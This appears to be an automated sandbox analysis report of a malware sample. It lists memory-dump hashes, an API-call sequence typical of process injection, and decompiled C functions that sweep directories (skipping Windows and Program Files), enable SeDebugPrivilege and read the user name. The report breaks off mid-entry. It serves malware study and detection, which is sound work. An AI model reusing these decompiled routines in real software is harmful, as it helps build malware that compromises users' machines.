                                      • Opcode ID: a3a3cf6869f9e182018f701ced1e69afa46b922f9d5901357817f555c396c766
                                      • Instruction ID: ac97d9899f7efd030a9687ad4e05dfc57c1d9f0e92bd9d4275efcdc1b50749fa
                                      • Opcode Fuzzy Hash: a3a3cf6869f9e182018f701ced1e69afa46b922f9d5901357817f555c396c766
                                      • Instruction Fuzzy Hash: 35F169F0D1420AEFCB08CFE5C5828EEBBB2FF99740B548559C405AB295D734AA46CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: J*K{
                                      • API String ID: 0-879598089
                                      • Opcode ID: ff94bd82003d11cadc2bde10c28d3fe282d72586f458d43aba006c8a26998f2e
                                      • Instruction ID: f997e61fbe813a5332c9f4e4f18abb0d7aa8cce7f6128793b5bdbc1e3627dacf
                                      • Opcode Fuzzy Hash: ff94bd82003d11cadc2bde10c28d3fe282d72586f458d43aba006c8a26998f2e
                                      • Instruction Fuzzy Hash: 5FD16AB0D1420AEFCB08CFE5C5828AEFBB2FF99340B558559C415AB295D334DA82CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: 9FGP
                                      • API String ID: 0-203624819
                                      • Opcode ID: eb66e9825b4f34a902fd3dd8f124093eaf8b4ef71b5b1c73538285c891015309
                                      • Instruction ID: d4ef10186da2ab0ec649d60ae38f22d7f6dcdac9f7d54d196002452b8f530d48
                                      • Opcode Fuzzy Hash: eb66e9825b4f34a902fd3dd8f124093eaf8b4ef71b5b1c73538285c891015309
                                      • Instruction Fuzzy Hash: FBB124B4E05219CBCB08CFE9C9455DEFBF6BF99300F24C52AD414AB394E734A9428B65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: 9FGP
                                      • API String ID: 0-203624819
                                      • Opcode ID: acd48513a23084154db7aa4f8ce7a78a82eebbcd083b74cad5348956ff44d145
                                      • Instruction ID: b265ed472f608c62969ef770621c9fb3eacedc7b1c2a837e50fb4ba86188c2fc
                                      • Opcode Fuzzy Hash: acd48513a23084154db7aa4f8ce7a78a82eebbcd083b74cad5348956ff44d145
                                      • Instruction Fuzzy Hash: BAB123B4E05219CBCB08CFE9C9415DEFBF6AF99300F24C52AD414AB394E73499428B65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ded303cd73b9a0594b6bf869d3b5c2c621d681163ff90028125abd3a659eb36
                                      • Instruction ID: db78d43aa347a0897445d50a71b2ed6dbecf9efb0dcca1ea28835233d6f9db94
                                      • Opcode Fuzzy Hash: 1ded303cd73b9a0594b6bf869d3b5c2c621d681163ff90028125abd3a659eb36
                                      • Instruction Fuzzy Hash: 753114B1E016189BDB18CFAAD9446CEBBF7BFC9311F14C1AAD409A6354DB345A86CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8a6cebfcb534a204465de7365ef395f8049932f153df4d1f43838857f9d814f6
                                      • Instruction ID: 311ca2a5477efc1aebe7894a3cd0ab4192dafb7096e38a1fd7b1a8864422716c
                                      • Opcode Fuzzy Hash: 8a6cebfcb534a204465de7365ef395f8049932f153df4d1f43838857f9d814f6
                                      • Instruction Fuzzy Hash: B021E9B1E056598BEB18CFA6C9553DEBFF3AFC9300F18C16AD408A6258DB340986CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 0100B6F0
                                      • GetCurrentThread.KERNEL32 ref: 0100B72D
                                      • GetCurrentProcess.KERNEL32 ref: 0100B76A
                                      • GetCurrentThreadId.KERNEL32 ref: 0100B7C3
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: 4defed04795f98a8f3feb4049c6080140848741829e85f6bef59ef49ec9d12f6
                                      • Instruction ID: 4c6169baf845dbfe8e27ba2d005d0f3308a7ab4319694ec308afce723fd228e2
                                      • Opcode Fuzzy Hash: 4defed04795f98a8f3feb4049c6080140848741829e85f6bef59ef49ec9d12f6
                                      • Instruction Fuzzy Hash: 3C5165B4900349CFDB55CFAAD48879EBBF1BF89308F248499E059A73A0D7345845CF62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 0100B6F0
                                      • GetCurrentThread.KERNEL32 ref: 0100B72D
                                      • GetCurrentProcess.KERNEL32 ref: 0100B76A
                                      • GetCurrentThreadId.KERNEL32 ref: 0100B7C3
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: 30481b876b97aae66d7e83ba15ceca222a1d3b3dc6911eff0e9b386482770b64
                                      • Instruction ID: b5bff1ad2a5a5464da9c5499a7f63e62a9c8099605981f23afa8dac612bc2952
                                      • Opcode Fuzzy Hash: 30481b876b97aae66d7e83ba15ceca222a1d3b3dc6911eff0e9b386482770b64
                                      • Instruction Fuzzy Hash: 7C5166B4900649CFDB54CFAAD588B9EBBF1BF88304F248499E059A33A0DB345844CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 010098D6
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: 15918d353e49acbaf336ef152bc1fcfb386d44e43742f1b66ff4ce199341dfc1
                                      • Instruction ID: 26d90cbd5e8b60149b8ec81804da26bcfe9c90e0f15981ca60cb5eb9e0aa231d
                                      • Opcode Fuzzy Hash: 15918d353e49acbaf336ef152bc1fcfb386d44e43742f1b66ff4ce199341dfc1
                                      • Instruction Fuzzy Hash: C6813271A00B058FEB65DF69D0407AABBF5BF88308F00892ED59AD7B81D774E905CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 071CAA6B
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 1cca077893e7296ae47e73f5754d3969c59d986f68543e6ca51428a7f4d6a44b
                                      • Instruction ID: e2b942471451174998a73f066d877acc1c2ed835ce92d1298b04dd7f894119f7
                                      • Opcode Fuzzy Hash: 1cca077893e7296ae47e73f5754d3969c59d986f68543e6ca51428a7f4d6a44b
                                      • Instruction Fuzzy Hash: C55129B1900319DFDF11CF99C880BDEBBB6BF48314F1585AAE849A7250DB309A89CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 071CAA6B
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0100FE0A
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: CreateWindow
                                      • String ID:
                                      • API String ID: 716092398-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0100FE0A
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: CreateWindow
                                      • String ID:
                                      • API String ID: 716092398-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 01005421
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 01005421
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071CB065
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071CB065
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100B93F
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071CADC7
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100B93F
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetThreadContext.KERNELBASE(?,00000000), ref: 071CACFF
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: ContextThread
                                      • String ID:
                                      • API String ID: 1591575202-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01009951,00000800,00000000,00000000), ref: 01009B62
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071CADC7
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetThreadContext.KERNELBASE(?,00000000), ref: 071CACFF
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: ContextThread
                                      • String ID:
                                      • API String ID: 1591575202-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01009951,00000800,00000000,00000000), ref: 01009B62
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071CAE83
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 071CB50D
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071CAE83
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 010098D6
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 071CB50D
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetWindowLongW.USER32(?,?,?), ref: 0100FF9D
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: LongWindow
                                      • String ID:
                                      • API String ID: 1378638983-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetWindowLongW.USER32(?,?,?), ref: 0100FF9D
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: LongWindow
                                      • String ID:
                                      • API String ID: 1378638983-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286385975.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286385975.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286385975.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286385975.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Executed Functions

                                      C-Code - Quality: 85%
                                      			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                      				struct _WIN32_FIND_DATAW _v596;
                                      				void* __ebx;
                                      				void* _t35;
                                      				int _t43;
                                      				void* _t52;
                                      				int _t56;
                                      				intOrPtr _t60;
                                      				void* _t66;
                                      				void* _t73;
                                      				void* _t74;
                                      				WCHAR* _t98;
                                      				void* _t99;
                                      				void* _t100;
                                      				void* _t101;
                                      				WCHAR* _t102;
                                      				void* _t103;
                                      				void* _t104;
                                      
                                      				L004067C4(0xa); // executed
                                      				_t72 = 0;
                                      				_t100 = 0x2e;
                                      				_t106 = _a16;
                                      				if(_a16 == 0) {
                                      					L15:
                                      					_push(_a8);
                                      					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                                      					_t104 = _t103 + 0xc;
                                      					if(_t98 == 0) {
                                      						L30:
                                      						__eflags = 0;
                                      						return 0;
                                      					}
                                      					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                                      					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                                      					_t73 = _t35;
                                      					if(_t73 == 0xffffffff) {
                                      						L29:
                                      						E00402BAB(_t98);
                                      						goto L30;
                                      					}
                                      					L17:
                                      					while(1) {
                                      						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                                      							if(_v596.dwFileAttributes != 0x10) {
                                      								L21:
                                      								_push( &(_v596.cFileName));
                                      								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                                      								_t104 = _t104 + 0xc;
                                      								if(_t101 == 0) {
                                      									goto L24;
                                      								}
                                      								if(_a12 == 0) {
                                      									E00402BAB(_t98);
                                      									E00403BEF(_t73);
                                      									return _t101;
                                      								}
                                      								_a12(_t101);
                                      								E00402BAB(_t101);
                                      								goto L24;
                                      							}
                                      							_t124 = _a20;
                                      							if(_a20 == 0) {
                                      								goto L24;
                                      							}
                                      							goto L21;
                                      						} else {
                                      							L24:
                                      							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                                      							_t43 = FindNextFileW(_t73,  &_v596); // executed
                                      							if(_t43 == 0) {
                                      								E00403BEF(_t73); // executed
                                      								goto L29;
                                      							}
                                      							_t100 = 0x2e;
                                      							continue;
                                      						}
                                      					}
                                      				}
                                      				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                                      				if(_t102 == 0) {
                                      					L14:
                                      					_t100 = 0x2e;
                                      					goto L15;
                                      				}
                                      				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                                      				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                                      				_t74 = _t52;
                                      				if(_t74 == 0xffffffff) {
                                      					L13:
                                      					E00402BAB(_t102);
                                      					_t72 = 0;
                                      					goto L14;
                                      				} else {
                                      					goto L3;
                                      				}
                                      				do {
                                      					L3:
                                      					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                                      						goto L11;
                                      					}
                                      					if(_a24 == 0) {
                                      						L7:
                                      						if(E00405D24( &(_v596.cFileName)) >= 3) {
                                      							L9:
                                      							_push( &(_v596.cFileName));
                                      							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                                      							_t103 = _t103 + 0xc;
                                      							_a16 = _t60;
                                      							_t115 = _t60;
                                      							if(_t60 == 0) {
                                      								goto L11;
                                      							}
                                      							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                                      							E00402BAB(_a16);
                                      							_t103 = _t103 + 0x1c;
                                      							if(_t99 != 0) {
                                      								E00402BAB(_t102);
                                      								E00403BEF(_t74);
                                      								return _t99;
                                      							}
                                      							goto L11;
                                      						}
                                      						_t66 = 0x2e;
                                      						_t114 = _v596.cFileName - _t66;
                                      						if(_v596.cFileName == _t66) {
                                      							goto L11;
                                      						}
                                      						goto L9;
                                      					}
                                      					_push(L"Windows");
                                      					if(E00405EFF( &(_v596.cFileName)) != 0) {
                                      						goto L11;
                                      					}
                                      					_push(L"Program Files");
                                      					if(E00405EFF( &(_v596.cFileName)) != 0) {
                                      						goto L11;
                                      					}
                                      					goto L7;
                                      					L11:
                                      					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                                      					_t56 = FindNextFileW(_t74,  &_v596); // executed
                                      				} while (_t56 != 0);
                                      				E00403BEF(_t74); // executed
                                      				goto L13;
                                      			}





















                                      APIs
                                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$FirstNext
                                      • String ID: %s\%s$%s\*$Program Files$Windows
                                      • API String ID: 1690352074-2009209621
                                      • Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                                      • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                      • Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                                      • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 78%
                                      			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                                      				void* _v8;
                                      				struct _LUID _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				struct _TOKEN_PRIVILEGES _v32;
                                      				intOrPtr* _t13;
                                      				void* _t14;
                                      				int _t16;
                                      				int _t31;
                                      				void* _t32;
                                      
                                      				_t31 = 0;
                                      				E004060AC();
                                      				_t32 = __eax;
                                      				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                                      				_t14 =  *_t13(_t32, 0x28,  &_v8);
                                      				if(_t14 != 0) {
                                      					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                                      					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                                      					if(_t16 != 0) {
                                      						_push(__ebx);
                                      						_v32.Privileges = _v16.LowPart;
                                      						_v32.PrivilegeCount = 1;
                                      						_v24 = _v16.HighPart;
                                      						_v20 = 2;
                                      						E004031E5(1, 9, 0xc1642df2, 0, 0);
                                      						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                                      						_t31 =  !=  ? 1 : 0;
                                      					}
                                      					E00403C40(_v8);
                                      					return _t31;
                                      				}
                                      				return _t14;
                                      			}














                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 3615134276-2896544425
                                      • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                      • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                      • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                      • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00402B7C(long _a4) {
                                      				void* _t4;
                                      				void* _t7;
                                      
                                      				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                      				_t7 = _t4;
                                      				if(_t7 != 0) {
                                      					E00402B4E(_t7, 0, _a4);
                                      				}
                                      				return _t7;
                                      			}






                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                      • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcess
                                      • String ID:
                                      • API String ID: 1357844191-0
                                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00406069(WCHAR* _a4, DWORD* _a8) {
                                      				int _t4;
                                      				void* _t5;
                                      
                                      				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                                      				_t4 = GetUserNameW(_a4, _a8); // executed
                                      				return _t4;
                                      			}






                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                      • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                      • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                      • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: recv
                                      • String ID:
